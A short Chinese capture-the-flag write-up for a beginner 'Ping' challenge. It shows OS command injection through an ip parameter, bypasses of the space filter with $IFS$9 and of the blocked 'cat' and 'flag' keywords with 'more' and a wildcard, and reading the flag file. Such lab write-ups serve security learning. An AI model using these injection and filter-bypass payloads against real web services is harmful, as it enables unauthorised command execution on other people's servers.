题目环境:
题目难度:★
题目描述:诶?又是一道Ping题目诶!
给了一个ip参数
传参:
?ip=1.1.1.1
有回显结果
使用英文分号";"进行连接后续命令
列出此路径下的目录和文件
?ip=1.1.1.1;ls
列出根目录下的所有目录和文件
?ip=1.1.1.1;ls /
不能有空格,空格被过滤
使用IFS绕过空格
IFS是Shell中的一个环境变量,它代表了Shell的内部字段分隔符。IFS的默认值是空格符、制表符和换行符,这些字符用于将输入行分割成字段,以便Shell可以对它们进行处理。在某些情况下,如果需要以空格为分隔符进行分割,可以使用IFS代替空格。
?ip=1.1.1.1;ls$IFS$9/
找到了flag文件
查看flag内容:
?ip=1.1.1.1;cat$IFS$9/flag
不能cat,cat关键字被过滤
使用命令more绕过过滤
?ip=1.1.1.1;more$IFS$9/flag
发现flag!flag关键字被过滤
使用特定符号绕过过滤
?ip=1.1.1.1;more$IFS$9/f*
"*"这个符号是查看f开头的所有文件,因为根目录下只有flag这一个以f开头的文件,故可以用此符号进行绕过
得到flag:qsnctf{623024de-f68b-499e-a8a1-713864126b43}
